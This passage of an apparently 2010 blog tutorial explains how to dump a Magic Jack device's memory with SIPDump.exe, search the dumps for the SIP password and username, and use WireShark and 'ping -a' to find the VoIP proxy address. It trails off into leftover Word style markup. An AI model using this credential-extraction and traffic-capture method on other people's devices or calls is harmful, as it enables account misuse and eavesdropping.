<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;">3.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>When you see it starts to load and see the ad on the left hand side start to show click ok on the SIPDump.exe.</p>
<p class="MsoListParagraphCxSpMiddle"><!--[if gte vml 1]><v:shape  id="Picture_x0020_1" o:spid="_x0000_i1033" type="#_x0000_t75" alt="mjdump.jpg"  style='width:437.25pt;height:277.5pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image002.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image002.jpg"   o:title="mjdump" /> </v:shape><![endif]--></p>
<p class="MsoListParagraphCxSpMiddle" style="text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/mjdump.jpg" target="_blank"><img class="size-full wp-image-130 aligncenter" title="mjdump" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/mjdump.jpg" alt="" width="300" height="166" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="text-align: center;">Click for a larger image</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; text-align: left; padding-left: 30px;">4.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>This will dump the memory into 4 dump files and stop Magic Jack. These dump files will be located in the directory where you ran SIPDump.exe from and be called SIPDump1-4. Each file <strong><span style="color: red;">must be a minimum size of 22,000 KB</span></strong>. If they are not please try again. We have found the password in smaller sized files but for some reason the Magic Jack do not work in the following steps.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/SIPDumpf.jpg" target="_blank"><img class="size-medium wp-image-133 aligncenter" title="SIPDumpf" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/SIPDumpf-300x53.jpg" alt="" width="300" height="53" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="text-align: center;">Click for a larger image</p>
<p class="MsoListParagraphCxSpMiddle"><!--[if gte vml 1]><v:shape  id="Picture_x0020_2" o:spid="_x0000_i1032" type="#_x0000_t75" alt="SIPDumpf.jpg"  style='width:324.75pt;height:57.75pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image004.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image004.jpg"   o:title="SIPDumpf" /> </v:shape><![endif]--></p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;">5.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>Now open the first SIPDump file and search for the <strong>EXACT </strong>phrase “SIP.Connection.Refresh” without the quotes. There should be only one instance of this phrase and your password should be located within a few lines above and or below it. Many articles on this say your password will be 20 characters, mine however is 21 characters. I also found mine in the second SIPDump file along with my SIP username which is still the standard <a href="mailto:E_your_number_01@talk4free.com">E_your_number_01@talk4free.com</a>.</p>
<p class="MsoListParagraphCxSpMiddle"><!--[if gte vml 1]><v:shape  id="Picture_x0020_3" o:spid="_x0000_i1031" type="#_x0000_t75" alt="sippassword.jpg"  style='width:217.5pt;height:165.75pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image005.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image005.jpg"   o:title="sippassword" /> </v:shape><![endif]--></p>
<p class="MsoListParagraphCxSpMiddle" style="text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/sippassword.jpg" target="_blank"><img class="aligncenter size-full wp-image-134" title="sippassword" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/sippassword.jpg" alt="" width="290" height="221" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="text-align: center;">Click for a larger image</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;">6.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>At this point we have our SIP username and password. We now need to get the proxy address that our Magic Jack is using. It will be in the format of proxy01.xxx.talk4free.com, where the xxx is the city where your proxy is. To do this I used WireShark. Since WireShark is not what this article is about, I will provide you with a high level instruction on how to use it to get what we need. Side note I know there are easier ways to do this but they are not as reliable. I also understand there are other ways to get this info out of WireShark but I am keeping it simple so the end user does not have to go through tons of packet capture to get what they need.</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in;">a.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span> Open WireShark. Once it is open click on Capture <span style="font-family: Wingdings;">à</span> Interfaces <span style="font-family: Wingdings;">à</span> Then the interface that is handling your networking and internet. This will also most likely be the only interface that has packets. Once you determine the interface to use choose start.</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in;"><!--[if gte vml 1]><v:shape id="Picture_x0020_4"  o:spid="_x0000_i1030" type="#_x0000_t75" alt="wireshark.jpg" style='width:453pt;  height:231.75pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image006.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image006.jpg"   o:title="wireshark" /> </v:shape><![endif]--></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/wireshark.jpg" target="_blank"><img class="aligncenter size-medium wp-image-137" title="wireshark" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/wireshark-300x153.jpg" alt="" width="300" height="153" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-align: center;">Click for a larger image</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in;">b.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>Once you start the capture start your Magic Jack and place a call to your test number. This will generate VOIP traffic that WireShark will capture and save. Once your test number answers or you get voicemail, hang up and stop the capture.</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/wireshark1.jpg"><img class="aligncenter size-full wp-image-138" title="wireshark1" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/wireshark1.jpg" alt="" width="296" height="134" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in;"><!--[if gte vml 1]><v:shape id="Picture_x0020_5"  o:spid="_x0000_i1029" type="#_x0000_t75" alt="wireshark1.jpg" style='width:222pt;  height:100.5pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image007.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image007.jpg"   o:title="wireshark1" /> </v:shape><![endif]--></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in;">c.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>Now that you have the packets, let’s find the VOIP info. To do this click on Statistics and then on<span style="font-family: Wingdings;"> </span> VoIP Calls.</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in;"><!--[if gte vml 1]><v:shape id="Picture_x0020_6"  o:spid="_x0000_i1028" type="#_x0000_t75" alt="wireshark2.jpg" style='width:390.75pt;  height:196.5pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image008.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image008.jpg"   o:title="wireshark2" /> </v:shape><![endif]--></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/wireshark2.jpg" target="_blank"><img class="aligncenter size-medium wp-image-139" title="wireshark2" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/wireshark2-300x150.jpg" alt="" width="300" height="150" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-align: center;">Click for a larger image</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in;">d.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>This will launch another window showing your call info:</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in;"><!--[if gte vml 1]><v:shape id="Picture_x0020_7"  o:spid="_x0000_i1027" type="#_x0000_t75" alt="wireshark3.jpg" style='width:468pt;  height:212.25pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image010.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image010.jpg"   o:title="wireshark3" /> </v:shape><![endif]--></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/wireshark3.jpg" target="_blank"><img class="aligncenter size-medium wp-image-142" title="wireshark3" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/wireshark3-300x135.jpg" alt="" width="300" height="135" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-align: center;">Click for a larger image</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in;">e.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>As you can see from the image above we have detected 1 VOIP call. From this screen we can Graph the call details or actually play the call back and listen to the conversation. Though playing the call back is cool is not what we need to continue. Click on “Graph”</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in;"><!--[if gte vml 1]><v:shape id="Picture_x0020_8"  o:spid="_x0000_i1026" type="#_x0000_t75" alt="wireshark4.jpg" style='width:5in;  height:207pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image012.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image012.jpg"   o:title="wireshark4" /> </v:shape><![endif]--></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/wireshark4.jpg" target="_blank"><img class="aligncenter size-medium wp-image-143" title="wireshark4" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/wireshark4-300x172.jpg" alt="" width="300" height="172" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-align: center;">Click for a larger image</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in;">f.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>This IP will vary based on where you live. To get the Fully Qualified Domain name (FQDN) we will open a command prompt and type “ping –a &lt;IP from above&gt;”</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/proxyip.jpg" target="_blank"><img class="aligncenter size-medium wp-image-144" title="proxyip" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/proxyip-300x61.jpg" alt="" width="300" height="61" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-align: center;">Click for a larger image</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in;"><!--[if gte vml 1]><v:shape id="Picture_x0020_9"  o:spid="_x0000_i1025" type="#_x0000_t75" alt="proxyip.jpg" style='width:351pt;  height:1in;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image013.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image013.jpg"   o:title="proxyip" /> </v:shape><![endif]--></p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in;">g.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>We now have all the required SIP information</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in; text-indent: -1.5in; padding-left: 120px;"><span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>i.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>SIP username: Etelephone-number01</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in; text-indent: -1.5in; padding-left: 120px;"><span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>ii.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>Password: L123456789101112133G (not a real password)</p>
<p class="MsoListParagraphCxSpLast" style="margin-left: 1.5in; text-indent: -1.5in; padding-left: 120px;"><span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>iii.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span>Proxy: proxy01.philadelphia.talk4free.com</p>
<p class="MsoListParagraphCxSpLast" style="margin-left: 1.5in; text-indent: -1.5in;"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" 